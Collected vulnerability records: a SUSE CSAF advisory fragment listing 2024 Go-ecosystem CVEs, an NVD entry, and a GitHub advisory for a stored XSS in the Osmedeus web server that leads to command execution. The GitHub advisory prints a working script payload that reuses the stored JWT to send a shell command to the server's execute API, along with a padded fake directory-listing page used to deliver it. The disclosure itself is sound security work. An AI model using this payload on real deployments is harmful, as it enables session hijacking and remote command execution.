Leap 15.5", "product_identification_helper": { "cpe": "cpe:/o:opensuse:leap:15.5" } } }, { "category": "product_name", "name": "openSUSE Leap 15.6", "product": { "name": "openSUSE Leap 15.6", "product_id": "openSUSE Leap 15.6", "product_identification_helper": { "cpe": "cpe:/o:opensuse:leap:15.6" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch as component of SUSE Linux Enterprise Module for Package Hub 15 SP5", "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" }, "product_reference": "govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP5" }, { "category": "default_component_of", "full_product_name": { "name": "govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch as component of SUSE Linux Enterprise Module for Package Hub 15 SP6", "product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" }, "product_reference": "govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP6" }, { "category": "default_component_of", "full_product_name": { "name": "govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch as component of openSUSE Leap 15.5", "product_id": "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" }, "product_reference": "govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "relates_to_product_reference": "openSUSE Leap 15.5" }, { "category": "default_component_of", "full_product_name": { "name": "govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch as component of openSUSE Leap 15.6", "product_id": "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" }, "product_reference": "govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "relates_to_product_reference": "openSUSE Leap 15.6" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-10389", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-10389" } ], "notes": [ { "category": "general", "text": "There exists a Path Traversal vulnerability in Safearchive on Platforms with Case-Insensitive Filesystems (e.g., NTFS). This allows Attackers to Write Arbitrary Files via Archive Extraction containing symbolic links. We recommend upgrading past commit f7ce9d7b6f9c6ecd72d0b0f16216b046e55e44dc", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] }, "references": [ { "category": "external", "summary": "CVE-2024-10389", "url": "https://www.suse.com/security/cve/CVE-2024-10389" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] } ], "threats": [ { "category": "impact", "date": "2024-11-22T10:44:11Z", "details": "moderate" } ], "title": "CVE-2024-10389" }, { "cve": "CVE-2024-10975", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-10975" } ], "notes": [ { "category": "general", "text": "Nomad Community and Nomad Enterprise (\"Nomad\") volume specification is vulnerable to arbitrary cross-namespace volume creation through unauthorized Container Storage Interface (CSI) volume writes. This vulnerability, identified as CVE-2024-10975, is fixed in Nomad Community Edition 1.9.2 and Nomad Enterprise 1.9.2, 1.8.7, and 1.7.15.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] }, "references": [ { "category": "external", "summary": "CVE-2024-10975", "url": "https://www.suse.com/security/cve/CVE-2024-10975" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] } ], "threats": [ { "category": "impact", "date": "2024-11-22T10:44:11Z", "details": "important" } ], "title": "CVE-2024-10975" }, { "cve": "CVE-2024-45794", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-45794" } ], "notes": [ { "category": "general", "text": "devtron is an open source tool integration platform for Kubernetes. In affected versions an authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user). This issue has been addressed in version 0.7.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] }, "references": [ { "category": "external", "summary": "CVE-2024-45794", "url": "https://www.suse.com/security/cve/CVE-2024-45794" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] } ], "threats": [ { "category": "impact", "date": "2024-11-22T10:44:11Z", "details": "important" } ], "title": "CVE-2024-45794" }, { "cve": "CVE-2024-48057", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-48057" } ], "notes": [ { "category": "general", "text": "localai \u003c=2.20.1 is vulnerable to Cross Site Scripting (XSS). When calling the delete model API and passing inappropriate parameters, it can cause a one-time storage XSS, which will trigger the payload when a user accesses the homepage.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] }, "references": [ { "category": "external", "summary": "CVE-2024-48057", "url": "https://www.suse.com/security/cve/CVE-2024-48057" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] } ], "threats": [ { "category": "impact", "date": "2024-11-22T10:44:11Z", "details": "moderate" } ], "title": "CVE-2024-48057" }, { "cve": "CVE-2024-51735", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-51735" } ], "notes": [ { "category": "general", "text": "Osmedeus is a Workflow Engine for Offensive Security. Cross-site Scripting (XSS) occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server. When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the `general-template.md` template.The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS. This may lead to commands executed on the host as well. This issue is not yet resolved. Users are advised to add their own filtering or to reach out to the developer to aid in developing a patch.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] }, "references": [ { "category": "external", "summary": "CVE-2024-51735", "url": "https://www.suse.com/security/cve/CVE-2024-51735" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] } ], "threats": [ { "category": "impact", "date": "2024-11-22T10:44:11Z", "details": "important" } ], "title": "CVE-2024-51735" }, { "cve": "CVE-2024-51744", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-51744" } ], "notes": [ { "category": "general", "text": "golang-jwt is a Go implementation of JSON Web Tokens. Unclear documentation of the error behavior in `ParseWithClaims` can lead to situation where users are potentially not checking errors in the way they should be. Especially, if a token is both expired and invalid, the errors returned by `ParseWithClaims` return both error codes. If users only check for the `jwt.ErrTokenExpired ` using `error.Is`, they will ignore the embedded `jwt.ErrTokenSignatureInvalid` and thus potentially accept invalid tokens. A fix has been back-ported with the error handling logic from the `v5` branch to the `v4` branch. In this logic, the `ParseWithClaims` function will immediately return in \"dangerous\" situations (e.g., an invalid signature), limiting the combined errors only to situations where the signature is valid, but further validation failed (e.g., if the signature is valid, but is expired AND has the wrong audience). This fix is part of the 4.5.1 release. We are aware that this changes the behaviour of an established function and is not 100 % backwards compatible, so updating to 4.5.1 might break your code. In case you cannot update to 4.5.0, please make sure that you are properly checking for all errors (\"dangerous\" ones first), so that you are not running in the case detailed above.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] }, "references": [ { "category": "external", "summary": "CVE-2024-51744", "url": "https://www.suse.com/security/cve/CVE-2024-51744" }, { "category": "external", "summary": "SUSE Bug 1232936 for CVE-2024-51744", "url": "https://bugzilla.suse.com/1232936" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] } ], "scores": [ { "cvss_v3": { "baseScore": 3.1, "baseSeverity": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] } ], "threats": [ { "category": "impact", "date": "2024-11-22T10:44:11Z", "details": "low" } ], "title": "CVE-2024-51744" }, { "cve": "CVE-2024-51746", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-51746" } ], "notes": [ { "category": "general", "text": "Gitsign is a keyless Sigstore to signing tool for Git commits with your a GitHub / OIDC identity. gitsign may select the wrong Rekor entry to use during online verification when multiple entries are returned by the log. gitsign uses Rekor\u0027s search API to fetch entries that apply to a signature being verified. The parameters used for the search are the public key and the payload. The search API returns entries that match either condition rather than both. When gitsign\u0027s credential cache is used, there can be multiple entries that use the same ephemeral keypair / signing certificate. As gitsign assumes both conditions are matched by Rekor, there is no additional validation that the entry\u0027s hash matches the payload being verified, meaning that the wrong entry can be used to successfully pass verification. Impact is minimal as while gitsign does not match the payload against the entry, it does ensure that the certificate matches. This would need to be exploited during the certificate validity window (10 minutes) by the key holder.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] }, "references": [ { "category": "external", "summary": "CVE-2024-51746", "url": "https://www.suse.com/security/cve/CVE-2024-51746" }, { "category": "external", "summary": "SUSE Bug 1232903 for CVE-2024-51746", "url": "https://bugzilla.suse.com/1232903" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Module for Package Hub 15 SP5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "SUSE Linux Enterprise Module for Package Hub 15 SP6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.5:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch", "openSUSE Leap 15.6:govulncheck-vulndb-0.0.20241112T145010-150000.1.17.1.noarch" ] } ], "threats": [ { "category": "impact", "date": "2024-11-22T10:44:11Z", "details": "low" } ], "title": "CVE-2024-51746" } ] }
fkie_cve-2024-51735
Vulnerability from fkie_nvd
Vendor | Product | Version |
---|
{ "cveTags": [], "descriptions": [ { "lang": "en", "value": "Osmedeus is a Workflow Engine for Offensive Security. Cross-site Scripting (XSS) occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server. When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the `general-template.md` template.The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS. This may lead to commands executed on the host as well. This issue is not yet resolved. Users are advised to add their own filtering or to reach out to the developer to aid in developing a patch." }, { "lang": "es", "value": "Osmedeus es un motor de workflow para seguridad ofensiva. Se produce un ataque de Cross Site Scripting (XSS) en el servidor web de Osmedeus cuando se visualizan los resultados del workflow, lo que permite ejecutar comandos en el servidor. Cuando se utiliza un workflow que contiene el m\u00f3dulo de resumen, se generan informes en formatos HTML y Markdown. El informe predeterminado se basa en la plantilla `general-template.md`. Se leen los contenidos de los archivos y se utilizan para generar el informe. Sin embargo, los contenidos de los archivos no se filtran correctamente, lo que genera un ataque de Cross Site Scripting (XSS). Esto tambi\u00e9n puede provocar la ejecuci\u00f3n de comandos en el host. Este problema a\u00fan no se ha resuelto. Se recomienda a los usuarios que agreguen su propio filtrado o que se pongan en contacto con el desarrollador para que les ayude a desarrollar un parche." } ], "id": "CVE-2024-51735", "lastModified": "2024-11-06T18:17:17.287", "metrics": { "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 8.7, "baseSeverity": "HIGH", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "PASSIVE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "HIGH", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "security-advisories@github.com", "type": "Secondary" } ] }, "published": "2024-11-05T19:15:07.947", "references": [ { "source": "security-advisories@github.com", "url": "https://github.com/j3ssie/osmedeus/security/advisories/GHSA-wvv7-wm5v-w2gv" } ], "sourceIdentifier": "security-advisories@github.com", "vulnStatus": "Awaiting Analysis", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-79" }, { "lang": "en", "value": "CWE-80" } ], "source": "security-advisories@github.com", "type": "Secondary" } ] }
ghsa-wvv7-wm5v-w2gv
Vulnerability from github
Summary
XSS occurs on the Osmedues web server when viewing results from the workflow, allowing commands to be executed on the server.
Details
When using a workflow that contains the summary module, it generates reports in HTML and Markdown formats. The default report is based on the general-template.md
template.
```
Execute Summary Generated by Osmedeus {{Version}} at {{CurrentDay}}
Scan Information
🚀 Subdomains
🌐 HTTP Fingerprint
🐞 Vulnerability
List of Vulnerability Reports
Jaeles Scan
Nuclei Scan
🕷️ Spider Content
📃 Content Discovery
🔍 Port Scan
```
The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS The issue starts with processing the tags, and XSS occurs when the extendTag function is called.
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L36 https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L95 https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L114 https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L122-L124
The condition to enter this if branch must meet one of the following cases:
- Tag shorten=true: In the default template, only subdomains have this tag ⇒ Subdomains cannot contain special characters, so XSS is not possible.
- len(fileContent) > r.Opt.MDCodeBlockLimit: Simply put, the content length needs to exceed the MDCodeBlockLimit configuration (default is 10,000).
After reviewing the files loaded in the default template, we select Spider Content because it meets the conditions:
- It can contain special characters since the spider retrieves results through Katana ⇒ Katana parses content based on tags ⇒ We can create custom payloads by leveraging this mechanism." ``` <! -- Fake Index Content -->
Directory listing for /
``` * Easily bypass the condition len(fileContent) > r.Opt.MDCodeBlockLimit * Spider is a module within the general workflow ⇒ a default workflow that is most commonly used
PoC
https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing
Payload RCE
<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>
File index payload ```
Directory listing for /Directory listing for /
- 1
- 675559605-1278d133b090b74129f65f6d108d2c83.pdf
- 959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe
- [MS-DOCX]-240416.docx
- AnyDesk.exe
- Attachment.zip
- barker.tar
- c1awptpm_1721182413858.pdf
- cacert.der
- caido-desktop-logs-1729480323.zip
- caido-desktop-v0.41.0-win-x86_64.exe
- caido-desktop-v0.42.0-win-x86_64.exe
- cdd
- CentOS-7-live-GNOME-x86_64.iso
- chrome-integrate.zip
- ChromeSetup.exe
- Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf
- CxSAST.950.Release.Setup_9.5.0.100.7z
- CÁC QUY ĐỊNH & TIÊU CHUẨN CẦN BIẾT CHO DOANH NGHIỆP NHỰA XUẤT KHẨU VÀO EU.pdf
- Danh sach may chu T18.xlsx
- de4dot-net45.zip
- de4dot-netcoreapp3.1.zip
- desktop.ini
- disk-1.KkwpoIcO.vmdk.part
- disk-1.vmdk
- dist.zip
- dnSpy-net-win64.zip
- doc.9.1.0.rar
- download
- Earned_Achievements_2024-09-16.pdf
- Eazfuscator.NET 2024.1 Setup.msi
- flare-ida-master.zip
- gitlab-recovery-codes.txt
- Hacking Rust.pdf
- Huong dan cai dat Oracle New.docx
- ida83_sdk_tools_v2.zip
- ida84_sdk_tools.zip
- IDARustDemangler.py
- idb2pat.py
- incident-notification_26.03.2024-2.pdf
- ironword.2024.8.3.nupkg
- KCSC_Recruitment.pdf
- Kế hoạch đào tạo 05102023 (2).xlsx
- linkfinder.json
- Margherita Report Demo_report.pdf
- Mastering_Malware_Analysis.pdf
- Mẫu-Danh sach Quan ly Backup-CS_v1.xlsx
- node-v20.17.0-x64.msi
- OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip
- OSED Notes Study Overview by Joas Antonio.pdf
- PAKD paytech.xlsx
- password
- patriotctf.rar
- pestudio-9.59.zip
- photo_2023-01-04_09-04-52.jpg
- photo_2023-01-04_09-04-55 (2).jpg
- photo_2023-01-04_09-04-55.jpg
- photo_2024-09-27_09-47-55.jpg
- Phụ lục 5.xlsx
- plugin.zip
- processhacker-2.39-setup.exe
- publications.pdf
- pwnfox.json
- pykd_ext_2.0.0.25.zip
- rp-win.zip
- rs.zip
- rustup-init.exe
- setup.exe
- Single Page Applications with Vue.js.rar
- Skilled_Person_Registration_Template_2pWPpnl.xlsx
- snapshot_2024-10-03_12-14.zip
- spire.doc.12.7.3.nupkg
- spire.doc.9.1.0.nupkg
- spire.doc.cpp.11.4.5.nupkg
- sticker.webm
- Telegram Desktop/
- test
- test.php
- test2
- test1.php
- test2.php
- test3.php
- test4.php
- test5.php
- test6.php
- test7.php
- test8.php
- test9.php
- test10.php
- test11.php
- test12.php
- test13.php
- test14.php
- test15.php
- test16.php
- test17.php
- test18.php
- test19.php
- test20.php
- test21.php
- test22.php
- test23.php
- test24.php
- test25.php
- test26.php
- test27.php
- test28.php
- test29.php
- test30.php
- test31.php
- test32.php
- test33.php
- test34.php
- test35.php
- test36.php
- test37.php
- test38.php
- test39.php
- test40.php
- test41.php
- test42.php
- test43.php
- test44.php
- test45.php
- test46.php
- test47.php
- test48.php
- test49.php
- test50.php
- test51.php
- test52.php
- test53.php
- test54.php
- test55.php
- test56.php
- test57.php
- test58.php
- test59.php
- test60.php
- test61.php
- test62.php
- test63.php
- test64.php
- test65.php
- test66.php
- test67.php
- test68.php
- test69.php
- test70.php
- test71.php
- test72.php
- test73.php
- test74.php
- test75.php
- test76.php
- test77.php
- test78.php
- test79.php
- test80.php
- test81.php
- test82.php
- test83.php
- test84.php
- test85.php
- test86.php
- test87.php
- test88.php
- test89.php
- test90.php
- test91.php
- test92.php
- test93.php
- test94.php
- test95.php
- test96.php
- test97.php
- test98.php
- test99.php
- test100.php
- test101.php
- test102.php
- test103.php
- test104.php
- test105.php
- test106.php
- test107.php
- test108.php
- test109.php
- test110.php
- test111.php
- test112.php
- test113.php
- test114.php
- test115.php
- test116.php
- test117.php
- test118.php
- test119.php
- test120.php
- test121.php
- test122.php
- test123.php
- test124.php
- test125.php
- test126.php
- test127.php
- test128.php
- test129.php
- test130.php
- test131.php
- test132.php
- test133.php
- test134.php
- test135.php
- test136.php
- test137.php
- test138.php
- test139.php
- test140.php
- test141.php
- test142.php
- test143.php
- test144.php
- test145.php
- test146.php
- test147.php
- test148.php
- test149.php
- test150.php
- test151.php
- test152.php
- test153.php
- test154.php
- test155.php
- test156.php
- test157.php
- test158.php
- test159.php
- test160.php
- test161.php
- test162.php
- test163.php
- test164.php
- test165.php
- test166.php
- test167.php
- test168.php
- test169.php
- test170.php
- test171.php
- test172.php
- test173.php
- test174.php
- test175.php
- test176.php
- test177.php
- test178.php
- test179.php
- test180.php
- test181.php
- test182.php
- test183.php
- test184.php
- test185.php
- test186.php
- test187.php
- test188.php
- test189.php
- test190.php
- test191.php
- test192.php
- test193.php
- test194.php
- test195.php
- test196.php
- test197.php
- test198.php
- test199.php
- test200.php
- test201.php
- test202.php
- test203.php
- test204.php
- test205.php
- test206.php
- test207.php
- test208.php
- test209.php
- test210.php
- test211.php
- test212.php
- test213.php
- test214.php
- test215.php
- test216.php
- test217.php
- test218.php
- test219.php
- test220.php
- test221.php
- test222.php
- test223.php
- test224.php
- test225.php
- test226.php
- test227.php
- test228.php
- test229.php
- test230.php
- test231.php
- test232.php
- test233.php
- test234.php
- test235.php
- test236.php
- test237.php
- test238.php
- test239.php
- test240.php
- test241.php
- test242.php
- test243.php
- test244.php
- test245.php
- test246.php
- test247.php
- test248.php
- test249.php
- test250.php
- test251.php
- test252.php
- test253.php
- test254.php
- test255.php
- test256.php
- test257.php
- test258.php
- test259.php
- test260.php
- test261.php
- test262.php
- test263.php
- test264.php
- test265.php
- test266.php
- test267.php
- test268.php
- test269.php
- test270.php
- test271.php
- test272.php
- test273.php
- test274.php
- test275.php
- test276.php
- test277.php
- test278.php
- test279.php
- test280.php
- test281.php
- test282.php
- test283.php
- test284.php
- test285.php
- test286.php
- test287.php
- test288.php
- test289.php
- test290.php
- test291.php
- test292.php
- test293.php
- test294.php
- test295.php
- test296.php
- test297.php
- test298.php
- test299.php
- test300.php
- The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf
- ThuHo.rar
- Vue.js Master Class 2024 Edition.rar
- VueSchool - The Vue.js 3 Masterclass (2024-4).rar
- Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/
- Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar
- Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar
- Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar
- Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar
- win server 2016(1).ovf
- win server 2016.ovf
- yxfzssjq_1721182234998.pdf
```
Impact
Execute command on server
